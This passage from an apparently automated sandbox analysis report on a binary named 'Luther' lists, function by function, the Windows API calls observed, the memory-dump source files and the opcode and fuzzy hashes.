                                                                                                          • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 00E9EF67
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
                                                                                                          • String ID:
                                                                                                          • API String ID: 3183298772-0
                                                                                                          • Opcode ID: e9726c498895593a69360ed98b3b75c36450d766eb70b5665119c5c41b23de78
                                                                                                          • Instruction ID: 6aab733f412fc1b2e6c06977ca711aa6fae4686e63d9a1d414c36d1b03c1ccdc
                                                                                                          • Opcode Fuzzy Hash: e9726c498895593a69360ed98b3b75c36450d766eb70b5665119c5c41b23de78
                                                                                                          • Instruction Fuzzy Hash: EF5165B25083859BCB24EB54DC919DBB3DCEF84304F40192EF689E3151EF71A588C756
                                                                                                          APIs
                                                                                                          • VariantInit.OLEAUT32(?), ref: 00E99534
                                                                                                          • VariantClear.OLEAUT32 ref: 00E995A5
                                                                                                          • VariantClear.OLEAUT32 ref: 00E99604
                                                                                                          • VariantClear.OLEAUT32(?), ref: 00E99677
                                                                                                          • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00E996A2
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Variant$Clear$ChangeInitType
                                                                                                          • String ID:
                                                                                                          • API String ID: 4136290138-0
                                                                                                          • Opcode ID: 2cef8573adb0891bb4833efa7c273d37786b2ca86b8507cb9585e839f0c9cc0d
                                                                                                          • Instruction ID: 5f55a683c322a34d13673ef4a2ac997cc4fee246e92d50bf8d741e6d8dedf321
                                                                                                          • Opcode Fuzzy Hash: 2cef8573adb0891bb4833efa7c273d37786b2ca86b8507cb9585e839f0c9cc0d
                                                                                                          • Instruction Fuzzy Hash: A2514AB5A006199FCB14CF58C884EAAB7F8FF88314B15856DE916EB311E730E911CB90
                                                                                                          APIs
                                                                                                          • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00EA95F3
                                                                                                          • GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 00EA961F
                                                                                                          • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00EA9677
                                                                                                          • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00EA969C
                                                                                                          • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00EA96A4
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: PrivateProfile$SectionWrite$String
                                                                                                          • String ID:
                                                                                                          • API String ID: 2832842796-0
                                                                                                          • Opcode ID: cefcf672fe4e77d36ade00c940f16ea8edd762fa2eddd10e6d605bec53529193
                                                                                                          • Instruction ID: 9feaabe1e763241b982cbe89767a6523371324b9b04e8f36c85e1514afdea29a
                                                                                                          • Opcode Fuzzy Hash: cefcf672fe4e77d36ade00c940f16ea8edd762fa2eddd10e6d605bec53529193
                                                                                                          • Instruction Fuzzy Hash: A0514935A00614AFCB05DF65C985AAABBF5FF49314F048468E809AB3A2CB31FD41CB90
                                                                                                          APIs
                                                                                                          • LoadLibraryW.KERNEL32(?,00000000,?), ref: 00EB999D
                                                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00EB9A2D
                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00EB9A49
                                                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00EB9A8F
                                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 00EB9AAF
                                                                                                            • Part of subcall function 00E4F9D4: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00EA1A02,?,7529E610), ref: 00E4F9F1
                                                                                                            • Part of subcall function 00E4F9D4: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00E90354,00000000,00000000,?,?,00EA1A02,?,7529E610,?,00E90354), ref: 00E4FA18
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                                                                                          • String ID:
                                                                                                          • API String ID: 666041331-0
                                                                                                          • Opcode ID: d3b8df14e1ad8f77ccef97b52493ff8b7be4c306a0f4cc7b7dd4e27e682497db
                                                                                                          • Instruction ID: 31e9297f8683ddf6edee6d047a4b0bdd065edc52cff3cb9248d310c5be1ca680
                                                                                                          • Opcode Fuzzy Hash: d3b8df14e1ad8f77ccef97b52493ff8b7be4c306a0f4cc7b7dd4e27e682497db
                                                                                                          • Instruction Fuzzy Hash: 45513C35605205DFC701DF68C4859EABBF0FF49318B1591A8E90ABB362D731ED86CB81
                                                                                                          APIs
                                                                                                          • SetWindowLongW.USER32(00000002,000000F0,?), ref: 00EC766B
                                                                                                          • SetWindowLongW.USER32(?,000000EC,?), ref: 00EC7682
                                                                                                          • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00EC76AB
                                                                                                          • ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,00EAB5BE,00000000,00000000), ref: 00EC76D0
                                                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 00EC76FF
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$Long$MessageSendShow
                                                                                                          • String ID:
                                                                                                          • API String ID: 3688381893-0
                                                                                                          • Opcode ID: 0301ddc499aabd48103e53209960d43428272f3c856c99489b5d091b8f873c3e
                                                                                                          • Instruction ID: c3d43d6166c34949065ad94ccc69a990f82a90ae5b9175a4d7ed7d8811791dfc
                                                                                                          • Opcode Fuzzy Hash: 0301ddc499aabd48103e53209960d43428272f3c856c99489b5d091b8f873c3e
                                                                                                          • Instruction Fuzzy Hash: A541B035A08504AFD7258F2CCE48FAA7BA5EB09354F151268E899B72A0C672ED42DE50
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _free
                                                                                                          • String ID:
                                                                                                          • API String ID: 269201875-0
                                                                                                          • Opcode ID: 741db2755c65c174d48a3df4eb4bcf89828114732c3616fffa70dbbdf9a194a3
                                                                                                          • Instruction ID: 87e6fa3ec67e10c9546fff86031abfcfea2bf030d01271c6bc0d408808a6551e
                                                                                                          • Opcode Fuzzy Hash: 741db2755c65c174d48a3df4eb4bcf89828114732c3616fffa70dbbdf9a194a3
                                                                                                          • Instruction Fuzzy Hash: 9841B032A40A109FCB20DF78D881A69B7E6EF89354B1555ACEA15FB391DA31AD01CB81
                                                                                                          APIs
                                                                                                          • GetInputState.USER32 ref: 00EA4310
                                                                                                          • TranslateAcceleratorW.USER32(?,00000000,?), ref: 00EA4367
                                                                                                          • TranslateMessage.USER32(?), ref: 00EA4390
                                                                                                          • DispatchMessageW.USER32(?), ref: 00EA439A
                                                                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00EA43AB
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                                                                                          • String ID:
                                                                                                          • API String ID: 2256411358-0
                                                                                                          • Opcode ID: 3a8d189dbc5387362cbbb89d9b937a8267e3178acd92c8214746e87ae34021f7
                                                                                                          • Instruction ID: a65f47800b5431a6269d8b1bf058545816d042ad746841b4795fb4a8556580e6
                                                                                                          • Opcode Fuzzy Hash: 3a8d189dbc5387362cbbb89d9b937a8267e3178acd92c8214746e87ae34021f7
                                                                                                          • Instruction Fuzzy Hash: 1C31A5B0504345DEEF25CB24DC4DBB63BE8BB8A308F045569D462AA1E0E3F5B84DDB21
                                                                                                          APIs
                                                                                                          • GetWindowRect.USER32(?,?), ref: 00E92262
                                                                                                          • PostMessageW.USER32(00000001,00000201,00000001), ref: 00E9230E
                                                                                                          • Sleep.KERNEL32(00000000,?,?,?), ref: 00E92316
                                                                                                          • PostMessageW.USER32(00000001,00000202,00000000), ref: 00E92327
                                                                                                          • Sleep.KERNEL32(00000000,?,?,?,?), ref: 00E9232F
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessagePostSleep$RectWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 3382505437-0
                                                                                                          • Opcode ID: 70a7580742cfaa3ffbc739fe00e1fbf617aa03b8ffa1dbd96b50c58ec505311a
                                                                                                          • Instruction ID: c14cd5cc6a59791cb419007029c4c91c0fdaa80b3f366d91beffb9614eeebee2
                                                                                                          • Opcode Fuzzy Hash: 70a7580742cfaa3ffbc739fe00e1fbf617aa03b8ffa1dbd96b50c58ec505311a
                                                                                                          • Instruction Fuzzy Hash: 5931C071900219EFDF14CFA8CD89ADE3BB5EB04319F104229FA25BB2E0C771A944DB91
                                                                                                          APIs
                                                                                                          • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,00EACC63,00000000), ref: 00EAD97D
                                                                                                          • InternetReadFile.WININET(?,00000000,?,?), ref: 00EAD9B4
                                                                                                          • GetLastError.KERNEL32(?,00000000,?,?,?,00EACC63,00000000), ref: 00EAD9F9
                                                                                                          • SetEvent.KERNEL32(?,?,00000000,?,?,?,00EACC63,00000000), ref: 00EADA0D
                                                                                                          • SetEvent.KERNEL32(?,?,00000000,?,?,?,00EACC63,00000000), ref: 00EADA37
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: EventInternet$AvailableDataErrorFileLastQueryRead
                                                                                                          • String ID:
                                                                                                          • API String ID: 3191363074-0
                                                                                                          • Opcode ID: b9820c685e7f2e5901282b85782c0632daffd8d32d8ab8d78e4cc4b9dd21c73d
                                                                                                          • Instruction ID: c2a1e4fcf6af21b77d7268fd95a17a686571944377258576d3e62edc8334d151
                                                                                                          • Opcode Fuzzy Hash: b9820c685e7f2e5901282b85782c0632daffd8d32d8ab8d78e4cc4b9dd21c73d
                                                                                                          • Instruction Fuzzy Hash: B531AB71508604EFDB20CFA6DC84EABBBF8EB49354B10942EF406F6510DB71EE459B60
                                                                                                          APIs
                                                                                                          • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00EC61E4
                                                                                                          • SendMessageW.USER32(?,00001074,?,00000001), ref: 00EC623C
                                                                                                          • _wcslen.LIBCMT ref: 00EC624E
                                                                                                          • _wcslen.LIBCMT ref: 00EC6259
                                                                                                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 00EC62B5
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$_wcslen
                                                                                                          • String ID:
                                                                                                          • API String ID: 763830540-0
                                                                                                          • Opcode ID: 88f7f96582f67fc559948f0e8d1253ee49b2cc595d0c5896edbe5a16c940514c
                                                                                                          • Instruction ID: ca9b9bad9d99f97748cc06cc03c21e70d9a593327d6d0c5bb0cf01ea870f41c9
                                                                                                          • Opcode Fuzzy Hash: 88f7f96582f67fc559948f0e8d1253ee49b2cc595d0c5896edbe5a16c940514c
                                                                                                          • Instruction Fuzzy Hash: 742171759042589ADB119FA4CD84FEEB7B8EB44324F10522EFD25FA280D7729986CF50
                                                                                                          APIs
                                                                                                          • IsWindow.USER32(00000000), ref: 00EB13AE
                                                                                                          • GetForegroundWindow.USER32 ref: 00EB13C5
                                                                                                          • GetDC.USER32(00000000), ref: 00EB1401
                                                                                                          • GetPixel.GDI32(00000000,?,00000003), ref: 00EB140D
                                                                                                          • ReleaseDC.USER32(00000000,00000003), ref: 00EB1445
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$ForegroundPixelRelease
                                                                                                          • String ID:
                                                                                                          • API String ID: 4156661090-0
                                                                                                          • Opcode ID: 2b92c2603e2e1bbae56b2c49ff2bb1539651661e89886d046eca4966f6b99589
                                                                                                          • Instruction ID: cd4e6d8e2a641271a64bc5b122a4216142f8113d11e13047d7173eb24f3213f4
                                                                                                          • Opcode Fuzzy Hash: 2b92c2603e2e1bbae56b2c49ff2bb1539651661e89886d046eca4966f6b99589
                                                                                                          • Instruction Fuzzy Hash: 89218B76600204AFDB04EF65CC99EAEBBF5EF88300B058479E84AB7351DA31AC05CB90
                                                                                                          APIs
                                                                                                          • GetEnvironmentStringsW.KERNEL32 ref: 00E6D146
                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00E6D169
                                                                                                            • Part of subcall function 00E63B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00E56A79,?,0000015D,?,?,?,?,00E585B0,000000FF,00000000,?,?), ref: 00E63BC5
                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00E6D18F
                                                                                                          • _free.LIBCMT ref: 00E6D1A2
                                                                                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00E6D1B1
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                          • String ID:
                                                                                                          • API String ID: 336800556-0
                                                                                                          • Opcode ID: b9805745285390c29f370bfa7a4ea718ce86da02873f88e2e6a628b7abcbd0e1
                                                                                                          • Instruction ID: ff8c8717c0bb2295f19f5f8c78383d60d9ccbd094a3465ccc327975f84d1bb75
                                                                                                          • Opcode Fuzzy Hash: b9805745285390c29f370bfa7a4ea718ce86da02873f88e2e6a628b7abcbd0e1
                                                                                                          • Instruction Fuzzy Hash: 8D01B572B4B6157F2321267A6C48CBB6A6DDEC3BE53580139B904E6140DAA18C0181B0
                                                                                                          APIs
                                                                                                          • GetLastError.KERNEL32(0000000A,?,?,00E5F64E,00E5545F,0000000A,?,00000000,00000000,?,00000000,?,?,?,0000000A,00000000), ref: 00E63170
                                                                                                          • _free.LIBCMT ref: 00E631A5
                                                                                                          • _free.LIBCMT ref: 00E631CC
                                                                                                          • SetLastError.KERNEL32(00000000,?,00000000,?,?,?,0000000A,00000000), ref: 00E631D9
                                                                                                          • SetLastError.KERNEL32(00000000,?,00000000,?,?,?,0000000A,00000000), ref: 00E631E2
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorLast$_free
                                                                                                          • String ID:
                                                                                                          • API String ID: 3170660625-0
                                                                                                          • Opcode ID: bb1fa15666fcb9dbd83742571fe41a535004b5285353d3095dff28dd5e241070
                                                                                                          • Instruction ID: 61e7131207c50c2a8cbd90dc2dde76465d49c47d9f5b59062660747d65c1f335
                                                                                                          • Opcode Fuzzy Hash: bb1fa15666fcb9dbd83742571fe41a535004b5285353d3095dff28dd5e241070
                                                                                                          • Instruction Fuzzy Hash: CD01F9726C6A002F96122735BC45D6B15ADAFD33F53212439F925F21C1EE32CE065111
                                                                                                          APIs
                                                                                                          • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00E90831,80070057,?,?,?,00E90C4E), ref: 00E9091B
                                                                                                          • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00E90831,80070057,?,?), ref: 00E90936
                                                                                                          • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00E90831,80070057,?,?), ref: 00E90944
                                                                                                          • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00E90831,80070057,?), ref: 00E90954
                                                                                                          • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00E90831,80070057,?,?), ref: 00E90960
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                                          • String ID:
                                                                                                          • API String ID: 3897988419-0
                                                                                                          • Opcode ID: 8436aa5952a8195d85efb713e0e67987381783552f774ff16bcfebdc8ba1a2ec
                                                                                                          • Instruction ID: 00dca5fd9517ca08e795c08e706c14188f9e2df1c2b8c73d0d402382a06e87b9
                                                                                                          • Opcode Fuzzy Hash: 8436aa5952a8195d85efb713e0e67987381783552f774ff16bcfebdc8ba1a2ec
                                                                                                          • Instruction Fuzzy Hash: 9E018B73604204AFEB154F5ADC44F9A7AADEBC4796F540134FD05F2212E772DD419BA0
                                                                                                          APIs
                                                                                                          • QueryPerformanceCounter.KERNEL32(?), ref: 00E9F2AE
                                                                                                          • QueryPerformanceFrequency.KERNEL32(?), ref: 00E9F2BC
                                                                                                          • Sleep.KERNEL32(00000000), ref: 00E9F2C4
                                                                                                          • QueryPerformanceCounter.KERNEL32(?), ref: 00E9F2CE
                                                                                                          • Sleep.KERNEL32 ref: 00E9F30A
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000000D.00000002.4496298656.0000000000E31000.00000020.00000001.01000000.00000008.sdmp, Offset: 00E30000, based on PE: true
                                                                                                          • Associated: 0000000D.00000002.4496278367.0000000000E30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000ECD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496351455.0000000000EF3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496401468.0000000000EFD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                          • Associated: 0000000D.00000002.4496429419.0000000000F05000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_13_2_e30000_Luther.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: PerformanceQuery$CounterSleep$Frequency
